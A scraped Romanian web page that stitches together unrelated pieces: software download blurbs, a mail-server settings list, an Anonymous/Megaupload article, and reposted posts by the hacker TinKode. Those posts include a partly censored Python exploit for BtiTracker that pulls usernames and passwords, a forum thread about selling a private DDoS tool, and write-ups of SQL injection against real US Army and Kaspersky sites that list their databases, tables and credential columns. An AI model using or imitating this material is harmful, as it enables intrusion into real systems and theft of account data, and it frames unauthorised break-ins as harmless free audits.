EssentialPIM

EssentialPIM Pro

EssentialPIM Pro is a personal information manager that makes it easy to control your appointments, to do lists, notes, email messages, password entries and contacts. EssentialPIM Pro is an affordable replacement for Outlook. In addition to built-in email support, EssentialPIM Pro offers portability, speed, intuitive interface, and the ability to synchronize all your information with Outlook and practically any online service available (Google, Yahoo, Toodledo, SyncML, CalDAV, etc.).

EssentialPIM Free

EssentialPIM Free is the award-winning, absolutely free personal information manager. Supported by a large community of users, EssentialPIM has been widely acknowledged as the best personal information management system on any desktop or USB flash drive. This powerful tool is not bloat ware and contains no spyware or adware. You have our guarantee!

EPIM Synchronizer

Free application that synchronizes EssentialPIM database files. Capable of either two-way or one-way synchronization of any EPIM databases. Works with local databases, in the same way as databases over a network. Supports encrypted databases. EPIM Synchronizer is all you'll ever need to keep two or more EssentialPIM database files in sync.

EPIM Archiver/DupeRemover

EPIM Archiver/DupeRemover is a freeware application designed to allow you to quickly archive outdated data from an existing EssentialPIM Pro / EssentialPIM Free database to a new archive, and to automatically remove duplicate items. It works the same for both local and network database files.

DOWNLOAD EssentialPIM

Download Desktop versions of EssentialPIM

EssentialPIM Pro 4.51                                         EssentialPIMPro4.exe

EssentialPIM Pro Network 4.51                          EssentialPIMProNet4.exe

EssentialPIM Free 4.51                                       EssentialPIM4.exe

Download Portable versions of EssentialPIM

EssentialPIM Pro Portable 4.51                           EssentialPIMProPort4.zip

EssentialPIM Free Portable 4.51                          EssentialPIMPort4.zip

Download Supplementary free software

EPIM Synchronizer 4.5                                        EPIMSync4.exe

EPIM Archiver/DupeRemover 4.5                        EPIMArchDR4.exe

Read More

Formatare Stick in NTFS

Pentru a converti formatul in NTFS folositi urmatorii pasi: click pe start, apoi run, apoi tastati cmd, scrieti aceasta poveste---> convert "drive_letter": /fs:ntfs -----> inlocuind "drive_letter" cu dive-ul stick-ului g,h,i etc.... apoi apasati tasta enter. That`s it!

Read More

Mail Server Settings for Hotmail, Yahoo Mail, GMail, MSN, AOL and more

*Update, 15th of March 2011: changes for the mail server settings of Gmail and MSN mail.

*Update, 23rd of August 2009: Hotmail can now be connected to Microsoft Outlook as any POP email account. To do so, you need to download the Microsoft Office Outlook Connector.

*Update, 29th of August 2006: the Google Gmail service offers a SMTP server (outgoing mail server) for Gmail accounts. To use the Google Gmail SMTP server, use the following information:

Google Gmail Outgoing Mail Server (SMTP): smtp.gmail.com

The Gmail SMTP server requires authentication (use the same settings as for the incoming mail server)

The Google Gmail SMTP Server requires an encrypted connection (SSL) on port 465.

Why & when do I need these settings?


Hotmail, Yahoo! Mail, GMail and other providers are basically email services designed to provide you with email mailbox accesss directly from the web. However, going online and logging on to their sites is not always the most convenient way for reading and sending emails.

On the other hand, you have the alternative to send and receive emails through such a mailbox by using a local email client software, such as Outlook Express, Microsoft Outlook, Thunderbird, etc. In order to properly use it, you need to configure your email software with the incoming and outgoing mail servers of your email provider (Hotmail, Gmail, Yahoo! Mail or else).


Mail Server Settings



• Hotmail Settings

As other web based email services, Hotmail is using the HTTP protocol for connecting you to your mailbox. If you want to send and receive Hotmail emails using an email client software, then your software must support Hotmail HTTP access for your email account. Some email clients, such as Outlook Express or Microsoft Outlook, offer builtin support for Hotmail accounts, so you only have to select HTTP when you are asked to select your email account type and select Hotmail as the HTTP Mail Service Provider.

Mail Server Settings for Hotmail using the Microsoft Outlook Connector

If you are using Microsoft Outlook & the Outlook Connector, you can define your Hotmail account just like any regular POP3 email account:
Hotmail Incoming Mail Server (POP3) - pop3.live.com (logon using Secure Password Authentification - SPA, mail server port: 995)
Hotmail Outgoing Mail Server (SMTP) - smtp.live.com (TLS enabled, port 587)
• Yahoo! Mail Settings

Yahoo Mail offers standard POP3 access for receiving emails incoming through your Yahoo mailbox, by using your favorite email client software. To setup your email client for working with your Yahoo account, you need to select the POP3 protocol and use the following mail server settings:
Yahoo Incoming Mail Server (POP3) - pop.mail.yahoo.com (SSL enabled, port 465)
Yahoo Outgoing Mail Server (SMTP) - smtp.mail.yahoo.com (SSL enabled, port 995)
POP Yahoo! Mail Plus email server settings
Yahoo Plus Incoming Mail Server (POP3) - plus.pop.mail.yahoo.com (SSL enabled, port 995)
Yahoo Plus Outgoing Mail Server (SMTP) - plus.smtp.mail.yahoo.com (SSL enabled, port 465, use authentication)
• Google GMail Settings

The Google GMail service offers email client access for retrieving and sending emails through your Gmail account. However, for security reasons, GMail uses POP3 over an SSL connection, so make sure your email client supports encrypted SSL connections.
Google Gmail Incoming Mail Server (POP3) - pop.gmail.com (SSL enabled, port 995)
Outgoing Mail Server - use the SMTP mail server address provided by your local ISP or smtp.gmail.com (TLS enabled, port 587)
• MSN Mail Settings

The MSN email service allows you to use the MSN POP3 and SMTP servers to access your MSN mailbox.
MSN Incoming Mail Server (POP3) - pop3.email.msn.com (port 110, using Secure Password Authentication - SPA)
MSN Outgoing Mail Server - smtp.email.msn.com (select "My outgoing server requires authentication")
• Lycos Mail Settings

The Lycos Mail Plus service allows you to use POP3 and SMTP servers for accessing your Lycos mailbox.
Lycos Mail Incoming Mail Server (POP3) - pop.mail.lycos.com (port 110)
Outgoing Mail Server - smtp.mail.lycos.com or use your local ISP SMTP mail server
• AOL Mail Settings

The AOL email service is a web based system, designed for managing your AOL mailbox via HTTP IMAP access. Unlike Hotmail, you can use any email client to access your AOL mailbox, as long as it supports the IMAP protocol.
AOL Incoming Mail Server (IMAP) - imap.aol.com (port 143)
AOL Outgoing Mail Server - smtp.aol.com or use your local ISP SMTP mail server
• Mail.com Mail Settings

The Mail.com email service allows you to use POP3 and SMTP servers for accessing your Mail.com mailbox.
Mail.com Mail Incoming Mail Server (POP3) - pop1.mail.com (port 110)
Outgoing Mail Server - use your local ISP SMTP mail server
• Netscape Internet Service Mail Settings

The Netscape e-mail system is web-based, which means you can access their e-mail from any Internet connection. Netscape Internet Service also supports AOL® Communicator, Microsoft® Outlook, Microsoft® Outlook Express, and other POP3 e-mail software. The outgoing mail server needs SSL support, so make sure your email client software supports SSL connections over the SMTP protocol.
Netscape Internet Service Incoming Mail Server (POP3) - pop.3.isp.netscape.com (port 110)
Netscape Internet Service Outgoing Mail Server - smtp.isp.netscape.com (port 25, using a secure SSL connection)
• Tiscali Mail Settings

The Tiscali email service allows you to use POP3 and SMTP servers for accessing your Tiscali mailbox.
Tiscali Incoming Mail Server (POP3) - pop.tiscali.com (port 110)
Outgoing Mail Server - use your local ISP SMTP mail server
• Freeserve Mail Settings

The Freeserve email service allows you to use POP3 and SMTP servers for accessing your Freeserve mailbox.
Freeserve Incoming Mail Server (POP3) - pop.freeserve.com (port 110)
Outgoing Mail Server - use your local ISP SMTP mail server
• Supanet Mail Settings

The Supanet email service allows you to use POP3 and SMTP servers for accessing your Supanet mailbox.
Supanet Incoming Mail Server (POP3) - pop.supanet.com (port 110)
Outgoing Mail Server - use your local ISP SMTP mail server
If your email client does not support Hotmail as a Mail Service Provider or if it simply doesn't work with your mail server settings, you can use a 3rd party solution like Thunderbird, IzyMail, POP Peeper or Email2Pop. When using such tools, you should define your Hotmail account as a POP3 account and you will need to define your incoming mail server will as 'localhost' (or 127.0.0.1). 

Read More

ISR Trinity Bomb DDoS Tool-Discutie pe forum

Nu am spus nici unde ca sursa e facuta de mine de la 0, doar ca nu e una singura, e facut din vreo 3,4 surse combinate. Daca esti asa de bun, iti poti face si tu unul asemanator, nimeni nu are ceva impotriva. Dar nu inteleg ce te f*** pe matale grija ce face altul? Stai in p*** mea in banca ta si daca nu iti place, intra in alt thread.
           
@ censored
1. Da
2. Nu

@ censored
Nu!
...................................................................................................................................................................

 Originally Posted by TinKode 
@censored
Nu am spus nici unde ca sursa e facuta de mine de la 0, doar ca nu e una singura, e facut din vreo 3,4 surse combinate. Daca esti asa de bun, iti poti face si tu unul asemanator, nimeni nu are ceva impotriva. Dar nu inteleg ce te f*** pe matale grija ce face altul? Stai in p*** mea in banca ta si daca nu iti place, intra in alt thread.

@ censored
1. Da
2. Nu

@ censored
Nu!

De unde pot sa descarc programul asta ?
...................................................................................................................................................................
 Originally Posted by  censored 10 
@TinKode ,Se pare ca esti unul din ala teribilist.Tu altfel nu stii sa vorbesti?
Asa imi place mie sa vorbesc cu persoanele care ma *** la cap, sunt mai pasnic de felul meu.

@ censored  Nu ai de unde. E privat. Money Money daca il vrei!
...................................................................................................................................................................

@TinKode,man chill.Nu e nevoie de injurii si de alte ca****ri.Numa ca lumea are dreptul la informatie.Frumos e sa faci public daca tot demonstrezi ceva..


@ censored ,stai linistit ca e testat de altii si merge prea bine.

---

Keywords: NEWS, Razvan Manole Cernacianu, TinKode, TinKode Hack Tool, TinKode Hacker,ISR Trinity Bomb DDoS Tool,Discutie pe forum.

---

Read More

TinKode-Youtube HTML Code Injection - InSecurity.RO

Read More

TinKode-Youtube Defaced and Redirected Insecurity.ro

Read More

TinKode-Google XSS - HTML Code Injection

Read More

TinKode-Translate.Google.Com XSS @ InSecurity.Ro

Read More

TinKode-BtiTracker 1.3.x – 1.4.x Exploit [Python]

BtiTracker 1.3.x – 1.4.x Exploit [Python]

Posted by: TinKode

Date: June 09, 2010 07:37PM

BtiTracker 1.3.x – 1.4.x Exploit

#!/usr/bin/env python# 
################################################################################
# ______           ____                                      __      [ xpl0it ] #
#/\__  _\        /\   _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __   __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\  \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \  \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\  \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/  \/___/  \/_/   \/_/\/__/ `/___/> \ #
#                                                    _________________   /\___/ #
#                                                    www.insecurity.ro   \/__/  #
#                                                                               # 
################################################################################  
#                    [  BtiTracker 1.3.X - 1.4.X Exploit ]                      # 
#    Greetz: daemien, Sirgod, Puscas_Marin,  AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow,  paxnWo, begood, and ISR Staff      # 
################################################################################  
#                    Because we care, we're security aware                      # 
################################################################################  
 
import sys, urllib2, re
  
if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit  ==============="
    print "==============================================================="
    print "=               Discovered and coded by  TinKode               ="     
    print "=                      www.InSecurity.ro                       ="
    print "=                                                              ="
    print "= Local  Command:                                              ="
    print "= ./isr.py [http://webshit]  [ID]                              ="
    print "=                                                              ="
    print "==============================================================="
    exit()
  
if Censored
    id = 1
else:
    id = censored
  
shitcensored
censored
 censored
  
url  censored
censored
censored
print "\n"
print "============================================="
print "=================  InSecurity ================"
print "============================================="
  
html  = censored
censored =  censored
if  len(slobod)  > 0:
    print "ID       : "  + str(id)
    print "Username : " +  censored
    print "Password : " +  censored
    print "EMail    : " +  censored
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "censored..."
     
#InSecurity.ro - Romania

Read More

TinKode-Database disclosure www.insecurity.ro

Read More

TinKode-ISR Trinity Bomb DDoS Tool

Read More

vBulletin 4.x - 4.1.2 exploit

Read More

Mircea Badea & TinKode (TV)

Read More

TinKode - TV - NeptunTV (NASA)

Read More

TinKode - TV - British Forces News (MOD UK - Royal Navy)

Read More

TinKode-Nasa

Read More

TinKode - Facebook XSS

Read More

MySQL(Generally Available)

Download mysql-installer-5.5.20.0.msi

Mirrors in: Romania

•   xservers.ro    HTTP  

Europe

	Univ. of Technology / Vienna, Austria	HTTP	FTP
	Easynet, Belgium	HTTP	FTP

North America

	Rafal Rzeczkowski/ Hamilton, ON, Canada	HTTP	FTP
	University of Waterloo Computer Science Club, Canada	HTTP	FTP

MySQL Installer provides an easy to use, wizard-based installation experience for all your MySQL software needs. Included in the product are the latest versions of:

• MySQL Server
• All of our support connectors
• Workbench and sample models
• Sample databases
• Documentation

Read More

Anonymous

Anonymous (used as a mass noun) is an Internet meme that originated in 2003 on the imageboard 4chan, representing the concept of many online community users simultaneously existing as an anarchic, digitized global brain. It is also generally considered to be a blanket term for members of certain Internet subcultures, a way to refer to the actions of people in an environment where their actual identities are not known.
In its early form, the concept has been adopted by a decentralized online community acting anonymously in a coordinated manner, usually toward a loosely self-agreed goal, and primarily focused on entertainment. Beginning with 2008, the Anonymous collective has become increasingly associated with collaborative, international hacktivism, undertaking protests and other actions, often in retaliation against anti-digital piracy campaigns by motion picture and recording industry trade associations.Actions credited to "Anonymous" are undertaken by unidentified individuals who apply the Anonymous label to themselves as attribution.
Although not necessarily tied to a single online entity, many websites are strongly associated with Anonymous. This includes notable imageboards such as 4chan, their associated wikis, Encyclopædia Dramatica, and a number of forums. After a series of controversial, widely-publicized protests and distributed denial of service (DDoS) attacks by Anonymous in 2008, incidents linked to its cadre members have increased.In consideration of its capabilities, Anonymous has been posited by CNN to be one of the three major successors to WikiLeaks.

Origins as a concept and a meme

The name Anonymous itself is inspired by the perceived anonymity under which users post images and comments on the Internet. Usage of the term Anonymous in the sense of a shared identity began on imageboards. A tag of Anonymous is assigned to visitors who leave comments without identifying the originator of the posted content. Users of imageboards sometimes jokingly acted as if Anonymous were a real person. As the popularity of imageboards increased, the idea of Anonymous as a collective of unnamed individuals became an internet meme.
Anonymous broadly represents the concept of any and all people as an unnamed collective. As a multiple-use name, individuals who share in the "Anonymous" moniker also adopt a shared online identity, characterized as hedonistic and uninhibited. This is intended as a satirical, conscious adoption of the online disinhibition effect.

“	We [Anonymous] just happen to be a group of people on the internet who need — just kind of an outlet to do as we wish, that we wouldn't be able to do in regular society. ...That's more or less the point of it. Do as you wish. ... There's a common phrase: 'we are doing it for the lulz.'	”
—Trent Peacock. Search Engine: The face of Anonymous, February 7, 2008. Definitions tend to emphasize the fact that the concept, and by extension the collective of users, cannot be readily encompassed by a simple definition. Instead it is often defined by aphorisms describing perceived qualities. One self-description is: We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.

Read More

Site-ul Megaupload.com, închis în SUA

http://www.megaupload.com/

Justiţia americană a dispus joi închiderea site-ului emblematic de descărcări ilegale Megaupload.com şi arestearea responsabililor săi, atrăgând imediat un atac cibernetic din partea hackerilor Anonymus.

Patru responsabili ai site-ului cu sediul la Hong Kong, printre care şi fondatorul său, Kim Dotcom, în vârstă de 37 de ani, au fost arestaţi la Auckland, în Noua Zeelandă, pe baza unor mandate de arestare emise de SUA, conform Agerpres.

FBI (poliţia federală americană) şi Departamentul american de Justiţie au precizat într-un comunicat că acesta este "unul din cele mai importante cazuri de încălcare a drepturilor de autor procesate vreodată în SUA".

Site-ul Megaupload.com, care de joi aseară nu mai este accesibil în SUA, permitea găzduirea de fişiere şi transferul lor pe internet. Site-ul oferea acces liber la mii de filme, seriale, emisiuni de televiziune sau melodii, prin descărcări directe sau streaming.

Închiderea site-ului a fost urmată de represalii din partea colectivului de hackeri Anonymous, care a anunţat pe Twitter că a făcut inaccesibile site-urile FBI, Departamentului de Justiţie, casei de discuri Universal Music şi asociaţiei profesionale de discuri RIAA. Aceste patru site-uri au fost inaccesibile joi seară.

Sarkozy salută închiderea Megaupload.com

Închiderea Megaupload.com a fost în schimb salutată de Nicolas Sarkozy. Şeful statului francez a subliniat "că a lupta împotriva site-urilor de descărcare directă sau de streaming ilegale, care îşi bazează modelul comercial pe piratarea de opere, constituie o necesitate imperioasă pentru păstrarea diversităţii culturale şi înnoirea creaţiei", se arată într-un comunicat al Palatului Elysee.

În afara de site-ul mamă, circa 20 de nume de domenii afiliate Megaupload.com au fost închise de justiţia americană, care a confiscat bunuri de 50 de milioane de dolari şi a deschis dosare penale împotriva a şapte responsabili ai site-ului, printre care se numără şi cele patru persoane arestate în Noua Zeelandă.

Aceste şapte persoane sunt "responsabile de piratarea considerabilă pe internet a numeroase tipuri de conţinut protejat de drepturi de autor prin intermediul Megaupload.com şi a altor site-uri", au afirmat autorităţile americane. Aceşti responsabili sunt de asemenea acuzaţi că au avut profituri de circa 175 de milioane de dolari şi au cauzat "pierderi de peste o jumătate de miliard de dolari pentru proprietarii de drepturi de autori", oferind pe site-ul lor produse piratate, au mai precizat autorităţile americane.

Decizia justiţiei americane vine în contextul în care dezbaterea privind pirateria online a atins punctul de fierbere la Washington, unde Congresul încearcă să adopte două proiecte de lege mai dure împotriva acestui fenomen, SOPA şi PIPA.

Read More

Hash Codes

Download HashCodes_x86.exe
Download HashCodes_x64.exe
Download HashCodesSetup.exe

Program can hash data from keyboard, file or CD/DVD by Adler32, CRC32, CRC64, GOST, HAVAL, MD2, MD4, MD5, MD6, SHA-0, SHA-1, SHA-1-IME, SHA-224, SHA-256, SHA-384, SHA-512, RIPEMD-128, RIPEMD-160, RIPEMD-256, RIPEMD-320, TIGER or Whirlpool algorithm.

Features

• Hash data from keyboard, file or CD/DVD
• Uses Adler32, CRC32, CRC64, GOST, HAVAL, MD2, MD4, MD5, MD6, SHA-0, SHA-1, SHA-1-IME, SHA-224, SHA-256, SHA-384, SHA-512, RIPEMD-128, RIPEMD-160, RIPEMD-256, RIPEMD-320, TIGER and Whirlpool algorithm
• Copy hash codes to the clipboard or save to the disk
• Can compare hash codes
• Load saved hash code file to comparison
• The progress bar show the current process
• Suspend, resume or stop the hash process
• Save the log information
• Display the hashing time
• Version on 32-bit and 64-bit Windows system
• Can be used as standalone software
• Multilingual user interface (Chinese (Simplified), Chinese (Traditional), English, German, Italian, Polish, Slovenian, Spanish)
• Drag & Drop support

Read More

WinMerge

Download WinMerge-2.12.4-Setup.exe
Download WinMerge-2.12.4-exe.7z
Download WinMerge-2.12.4-exe.zip

Download WinMerge 7-zip-plugin
Merge7zInstaller0028-465-920.exe

What is WinMerge?

WinMerge is an Open Source differencing and merging tool for Windows. WinMerge can compare both  folders and files, presenting differences in a visual text format that is easy to understand and handle.
WinMerge is highly useful for determining what has changed between project versions, and then merging changes between versions. WinMerge can be used as an external differencing/merging tool or as a standalone application.


Features
In addition, WinMerge has many helpful supporting features that make comparing, synchronising, and merging as easy and useful as possible:

General 
■Supports Microsoft Windows 98/ME/2000/XP/2003/Vista/2008
■Handles Windows, Unix and Mac text file formats
■Unicode support
■Tabbed interface
File Compare
■Visual differencing and merging of text files
■Flexible editor with syntax highlighting, line numbers and word-wrap
■Highlights differences inside lines
■Difference pane shows current difference in two vertical panes
■Location pane shows map of files compared
■Moved lines detection
Folder Compare 
■Regular Expression based file filters allow excluding and including items
■Fast compare using file sizes and dates
■Compares one folder or includes all subfolders
■Can show folder compare results in a tree-style view
Version Control 
■Creates patch files (Normal-, Context- and Unified formats)
■Resolve conflict files
■Rudimentary Visual SourceSafe and Rational ClearCase integration
Other 
■Shell Integration (supports 64-bit Windows versions)
■Archive file support using 7-Zip
■Plugin support
■Localizable interface
■Online manual and installed HTML Help manual

Read More

TinKode-MySQL.com and Sun/Oracle Haked

Read More

TinKode-hacks into NASA servers

NOTE:

Until now, no. I don't do bad things. I only find and make public the info. Afterwards I send an email to them to fix the holes. It's like an security audit, but for free.

Read More

TinKode-Royalnavy.mod.uk Haked Image

Unfortunately the Royal Navy website is currently undergoing essential maintenance. Please visit again soon

Read More

TinKode-US Army full disclosure again

US Army full disclosure again

Posted by isrtinkode on February 19, 2010

                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:




Ok, in this picture we can see all main informations about webserver.

Main information:

#Version: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
#censored
#censored
#censored

All databases:

[0] censored
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES

We can access information_schema, so let’s see the tables from principal database “censored”

[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items

Now, here are some interesting tables, like censored.

Here i found censored columns, with :

#censored
#censored

wtf!
That it’s all! Bye, TinKode…

Read More

TinKode-Kaspersky Portugal Full Disclosure

Kaspersky Portugal Full Disclosure

Posted by isrtinkode on February 19, 2010

                     _   __                              _
                    | | / /                             | |
                    | |/ /  __ _ ___ _ __   ___ _ __ ___| | ___   _
                    |    \ / _` / __| '_ \ / _ \ '__/ __| |/ / | | |
                    | |\  \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |
                    \_| \_/\__,_|___/ .__/ \___|_|  |___/_|\_\\__, |
                                    | |                        __/ |
                                    |_|                       |___/

                                                                                  #owned by c0de.breaker

In one evening, when i searched a antivirus, I entered on the official kaspersky website of Portugal from mistake.
Link: www.kaspersky.com.pt
Kaspersky, from what i know has been hacked by “unu” with MySQLi.
So I said to try to see if I could find a vulnerability!
After 5 minutes of searching, I found something interesting, namely::

Warning: censored() [function.censored]: Query failed: ERROR: syntax error at or near "\" at character 306 in /home1/_sites/wwwkasperskycompt/kaspersky/PHP/IfDBRevendedoresKaspersky.phpclass on line 121
ERRO na execucao da query getRevendedors
ERROR: syntax error at or near "\" at character 306

censored() : That means as he use a censoredSQL database.
First time, i checked to see if is injectable, and if i can extract something.
The answer:
———————————————————–




———————————————————–
So I can make censoredSQL Injection!
What I extracted?
I wasn’t concerned about the content, I only “got” the names of databases, tables and columns.

#Principal Database: censored
#User: censored
#Version: censoredSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

#Other Databases

1 censored
2 template1
3 template0
4 monitoring
5 estkaspersky
6 horde
7 licence
8 hardwareipbrick
9 acessosclientes
10 licencefmota
11 temp
12 dbdoc
13 webcalendar
14 ipbox
15 adcav
16 jpleitao2
17 funambol
18 gaia
19 cinel2
20 makeupdate
21 tempdefaultconfig

#The tables from censored database (number:458)

1 table_base_idxml73
2 table_ass_idxml73_idtab1025
3 liga_tipoent_categoria
4 liga_subcat_categoria
5 classif_entidades
6 ignora
7 categoria_entidade
8 site
9 subcategoria_entidade
10 tabela_gestao_ipcontactos
11 ipcontactos_lang_files
12 utilizador_externo
13 webcal_sincro
14 pga_queries
15 pga_forms
16 pga_scripts
17 pga_reports
18 pga_schema
19 pga_layout
20 avaliar
21 estadorec1
22 liga_resultado_tarefa
23 webcal_user
24 utilizadores_operacao
25 webcal_entry
26 webcal_entry_repeats
27 webcal_entry_repeats_not
28 webcal_entry_user
29 webcal_entry_ext_user
30 webcal_user_pref
31 webcal_user_layers
32 exhumationprice
33 webcal_site_extras
34 webcal_reminder_log
35 webcal_group
36 table_base_idxml13
37 webcal_group_user
38 webcal_view
39 webcal_view_user
40 gravetype
41 webcal_entry_log
42 webcal_categories
43 webcal_config
44 cemeterysection
45 solucao
46 ipdoclanguages
47 ipdoctranslation
48 ipdocsentences
49 ipdocpages
50 ipdocpagetranslation
51 table_base_idxml15
52 table_ass_idxml15_idtab51
53 lockcodigos
54 assunto
55 table_base_idxml16
56 subassunto
57 table_ass_idxml16_idtab68
58 entidades2
59 coordenadas_estado
60 dados_infantarios
61 coordenadas_estadopr
62 codigo_accaopr
63 table_base_idxml17
64 raca
65 table_base_idxml18
66 table_base_idxml19
67 table_base_idxml20
68 table_base_idxml14
69 distrito
70 concelho
...
439 accaopr
440 table_base_idxml79
441 estadopr
442 funcaoproc
443 funcaopr
444 table_ass_idxml79_idtab1183
445 table_ass_idxml79_idtab1190
446 table_ass_idxml79_idtab1191
447 table_ass_idxml79_idtab1192
448 table_ass_idxml79_idtab1193
449 table_ass_idxml77_idtab1194
450 table_base_idxml78
451 table_ass_idxml80_idtab1216
452 table_base_idxml81
453 table_ass_idxml81_idtab1228
454 table_base_idxml70
455 table_base_idxml82
456 documento
457 revisaodoc
458 table_ass_idxml82_idtab1257

#Me: Ma gandesc, daca tot este una din cele mai mari compani din lume care asigura protectia poate a multor milioane de utilizatori prin produsele sale,
de ce nu au grija de propria securitatea in primul rand? Acest lucru poate fi si din cauza firmelor care creaza aceste website-uri intr-un timp foarte scurt pe sume exagerat de mari…
Cam atat.
~Where is a will, there is a way

Read More

TinKode-Kaspersky Thailand Full Access

Kaspersky Thailand Full Access

Posted by isrtinkode on February 19, 2010

 _  __                             _                                _
| |/ /                            | |              /\              (_)
| ' / __ _ ___ _ __   ___ _ __ ___| | ___   _     /  \   __ _  __ _ _ _ __
|  < / _` / __| '_ \ / _ \ '__/ __| |/ / | | |   / /\ \ / _` |/ _` | | '_ \
| . \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |  / ____ \ (_| | (_| | | | | |
|_|\_\__,_|___/ .__/ \___|_|  |___/_|\_\\__, | /_/    \_\__, |\__,_|_|_| |_|
              | |                        __/ |           __/ |
              |_|                       |___/           |___/

                     #Kaspersky Thailand full access@c0de.breaker

Ok… As you might remember, some time ago, I gained access into Kaspersky Portugal.
Now I found another vulnerable parameter in Kaspersky Thailand.
Because the mod_security was ON, it was hard for me to make the injection, and in order to extract tables,colums,etc you must have a vast knowledge about how to filter some things.
Testing:






Main Informations:

#Version: 5.1.30
#censored
#censored
#censored

All databases:

#information_schema
#censored
#censored

Tables from thaikasp_dealer:

#censored
#newheader
#tb_dealer
#tb_part

Tables from thaikasp_forum:

#forum
#tbmember

Columns from tbmember

#ID
#Username
#Password

And now all accounts from tbmember. I can’t understand why passwords aren’t encrypted!

#censored
#censored
#censored
#censored

Admin Control Panel:

Yeah, finish.
Bye, TinKode

Read More